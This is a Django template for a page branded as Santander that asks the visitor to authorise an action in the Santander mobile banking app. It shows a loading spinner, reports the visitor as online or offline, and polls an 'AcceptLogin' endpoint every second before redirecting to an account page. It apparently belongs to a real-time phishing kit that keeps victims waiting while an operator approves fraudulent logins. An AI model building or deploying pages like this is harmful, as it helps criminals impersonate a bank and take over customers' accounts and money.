{% load static %}
{% block content %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<title>Santander</title>
    <link rel="icon" href="{% static 'styles/favicon.ico' %}" type="image/x-icon">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="{% static 'styles/santander.css' %}">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<style type="text/css">
    .bs-example{
        margin: 20px;
    }
    
    
    .navbar-toggler:hover{
        
        background-color:#ec0000
        
        
    }
    
       a:hover{
        
        background-color:#ec0000
        
        
    }
    
    a{
        
        
        text-decoration:none !important;
        
        font-size:1rem !important;
        
        
    }
    
    input{
        
        border:1px solid #666;
        outline:none;
        box-shadow:none;
        border-radius:0px;
        border-style:solid;
        
    }
    input:focus{
        
        border:1px solid black !important;
        outline:none;
        box-shadow:none;
        border-radius:0px;
        border-style:solid;
        
    }


#submit:hover{

color: white !important



}

      .loader {
  border: 4px solid #ffe6e6;; /* Light grey */
  border-top: 4px solid #ef3131; /* Blue */
  border-radius: 50%;
  width: 55px;
  height: 55px;
  animation: spin .8s linear infinite;
  margin: 0 auto;
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}
</style>

</head>
<body style="background:white !important">
<div class="bs-example" style="width:100%;margin:0 auto !important">
    <nav class="navbar navbar-expand-md navbar-light bg-light" style="width:100%;margin:0 auto !important;background-color:#ec0000 !important;">
        <a href="#" class="navbar-brand" style="color:white"><img src="{% static 'styles/navbarimg.png' %}" width = "130px">  </a>
 
        </div>
    </nav>
    
    <div class="form-group" style="margin: 0 auto !important;padding-left:5%">
        <br>
        <h1 style="color:#666;margin: 0 auto !important;font-size: 2.2em;
font-weight: 400;
margin: 1em 0;
line-height: 1.2em;"></h1>
        
      
    </div>
    
       <div class="form-group" style="margin: 0 auto !important;padding-left:0%;width:85%">
        <br>
 <p style="font-size:16px">You are required to authorise this action through the Santander mobile banking app. Please open the application and follow the instructions accordingly.</p><br>
   <br>
     <div class="loader"></div> 
   
<input value="{{request.session.pid}}" id="pid" name="pid" style="visibility: hidden">
		

<br><br>
</div>
    
</div>
{% block javascript %}
<script>
    

function online(){

var ip_address = document.getElementById('pid').value 
console.log(ip_address)


$.ajax({


type: 'GET',
 
 url: '{% url "isActive" %}',

 data: {
            'pid': ip_address
        },
 


success: function(response){

  
if(response.accept){





}

   

},

error: function(response){







}




}

)}

</script>

<script>


function offline(){

var ip_address = document.getElementById('pid').value 

$.ajax({


type: 'GET',
 
 url: '{% url "bye" %}',

 data: {
            'pid': ip_address
        },
 


success: function(response){

  
if(response.accept){





}

   

},

error: function(response){







}





});




}




</script>

<script>
online()
</script>

<script>
$(window).on("beforeunload", function() { 
    offline()
})

</script>

<script>
    


$(document).ready(function(){

var pid = document.getElementById('pid').value 

setInterval(function()


{





$.ajax({


type: 'GET',
 
 url: '{% url "AcceptLogin" %}',

 data: {
            'pid': pid,
        },
 


success: function(response){

  
if(response.accept){



window.location.href = '{% url "Account" %}';


}

   

},

error: function(response){







}





});




},1000);







});

</script>

        {% endblock javascript %}
        

</body>

</html>

{% endblock %}
